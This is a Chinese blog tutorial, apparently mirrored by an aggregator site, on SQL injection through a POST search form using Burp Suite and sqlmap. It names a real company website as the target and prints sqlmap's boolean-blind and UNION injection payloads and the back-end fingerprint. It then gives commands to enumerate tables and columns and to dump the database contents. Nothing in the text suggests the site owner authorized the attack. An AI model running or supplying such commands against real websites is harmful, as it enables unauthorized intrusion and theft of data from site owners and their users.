zoukankan      html  css  js  c++  java
  • sqlmap post搜索框的注入

    post注入框的注入原理 大家可以自己百度一下哦!

    要进行post注入我们首先要抓包 。。

    用burpsuite或fildder

    打开浏览器,设置代理,如代理8080端口

    好了 随便输入一个1字 burpsuite已经抓到包了

    key=1&x=23&y=4

    然后我们启动sqlmap 构造一下(直接在命令行输入) sqlmap -u http://****.cn/product.asp --data "key=1&x=23&y=4"
    Place: POST
    Parameter: key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: key=1%' AND 1393=1393 AND '%'='&x=24&y=9

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: key=-3532%' UNION ALL SELECT NULL,NULL,CHR(113)&CHR(104)&CHR(101)&CHR(110)&CHR(113)&CHR(103)&CHR(109)&CHR(84)&CHR(80)&CHR(98)&CHR(100)&CHR(74)&CHR(105)&CHR(102)&CHR(102)&CHR(113)&CHR(105)&CHR(114)&CHR(108)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&x=24&y=9
    ---
    [23:58:56] [INFO] the back-end DBMS is Microsoft Access
    web server operating system: Windows
    web application technology: ASP
    back-end DBMS: Microsoft Access
    [23:58:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.zjyingsong.com'
    Place: POST


    嗯 post型注入 然后我们就可以猜解了

    sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --tables //猜解表段

     sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --columns -T 表段 //猜解字段

     

    sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --dump C "内容,内容," -T 刚才的表段 //猜解内容

  • 相关阅读:
    this
    git使用整个过程整理
    javaScript事件知识点
    charles-web端开发者实用功能点
    react native 添加第三方插件react-native-orientation(横竖屏设置功能 android)
    react native 运行项目下载gradle慢的解决办法
    移动端 滑动组件 slip
    高逼格 分页列表 bootstrap-table
    reactjs 接入数据模型以及markdown语法的支持
    react-native 环境搭建以及项目创建打包
  • 原文地址:https://www.cnblogs.com/bzdmz/p/11107420.html
Copyright © 2011-2022 走看看